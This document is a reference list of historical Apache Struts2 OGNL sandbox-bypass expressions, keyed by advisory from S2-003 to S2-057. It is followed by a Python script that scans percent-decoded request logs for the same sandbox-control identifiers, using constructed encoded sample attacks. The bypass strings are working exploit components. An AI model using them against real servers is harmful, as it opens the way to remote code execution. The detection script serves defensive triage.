Summary of historical Struts2 OGNL sandbox bypasses
Sandbox bypasses
S2-003 bypass:
#context[\'xwork.MethodAccessor.denyMethodExecution\']=false,
#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET
S2-005 bypass:
#_memberAccess.allowStaticMethodAccess=true
#context['xwork.MethodAccessor.denyMethodExecution']=false
#_memberAccess.excludeProperties=@java.util.Collections@EMPTY_SET
S2-009 bypass:
#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false)
#_memberAccess["allowStaticMethodAccess"]=true
S2-013 bypass:
#_memberAccess["allowStaticMethodAccess"]=true
S2-016 bypass:
No sandbox restriction; the OGNL expression is executed directly (TODO: not investigated in depth)
S2-019 bypass:
#f=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),
#f.setAccessible(true),
#f.set(#_memberAccess,true)
S2-032 bypass:
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
S2-037 bypass:
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
S2-045 bypass:
(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(
#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).
(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm))))
S2-046 bypass:
Same bypass as S2-045
S2-048 bypass:
Same bypass as S2-045
S2-057 bypass:
(#context=#attr['struts.valueStack'].context).(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.setExcludedClasses('')).(#ognlUtil.setExcludedPackageNames(''))
(#context=#attr['struts.valueStack'].context).(#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS))
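
Detection example (added here, not part of the original write-up): every bypass listed above has to name one of a small set of sandbox-control identifiers, so request logs can be triaged by percent-decoding each line and searching for them. The log format, the parameter name x and the sample lines are constructed for illustration; the identifier-to-advisory mapping is read off the list above.

```python
import re
from urllib.parse import unquote_plus

# Sandbox-control identifiers from the bypass list above, with the advisories
# under which the list shows them (S2-046/S2-048 reuse the S2-045 bypass).
INDICATORS = {
    "xwork.MethodAccessor.denyMethodExecution": "S2-003/005/009",
    "allowStaticMethodAccess": "S2-005/009/013/019",
    "_memberAccess": "S2-003 through S2-048",
    "DEFAULT_MEMBER_ACCESS": "S2-032/037/045/046/048/057",
    "getExcludedPackageNames": "S2-045/046/048",
    "getExcludedClasses": "S2-045/046/048",
    "setMemberAccess": "S2-045/046/048/057",
    "setExcludedPackageNames": "S2-057",
    "setExcludedClasses": "S2-057",
}
# OGNL identifiers are case-sensitive, so the match is case-sensitive too.
PATTERN = re.compile("|".join(map(re.escape, sorted(INDICATORS, key=len, reverse=True))))

# Constructed access-log lines: one benign, one encoded once, one encoded twice.
SAMPLE_LOG = [
    '10.0.0.5 "GET /index.action?page=2 HTTP/1.1" 200',
    '10.0.0.9 "GET /a.action?x=%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue HTTP/1.1" 200',
    '10.0.0.9 "GET /b.action?x=%2523_memberAccess%253D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS HTTP/1.1" 200',
]

def normalize(raw, rounds=3):
    """Percent-decode until stable (bounded), so double encoding does not hide a hit."""
    for _ in range(rounds):
        decoded = unquote_plus(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def scan(line):
    """Return the sorted, de-duplicated indicators present in one log line."""
    return sorted({m.group(0) for m in PATTERN.finditer(normalize(line))})

def triage(lines):
    """Map 1-based line number -> [(indicator, advisories)] for lines that hit."""
    found = ((no, scan(line)) for no, line in enumerate(lines, 1))
    return {no: [(h, INDICATORS[h]) for h in hits] for no, hits in found if hits}

if __name__ == "__main__":
    for no, hits in triage(SAMPLE_LOG).items():
        print(no, hits)
```

A hit is a lead for review rather than proof of compromise: it shows that a request carried a sandbox-control identifier, not that the expression was evaluated.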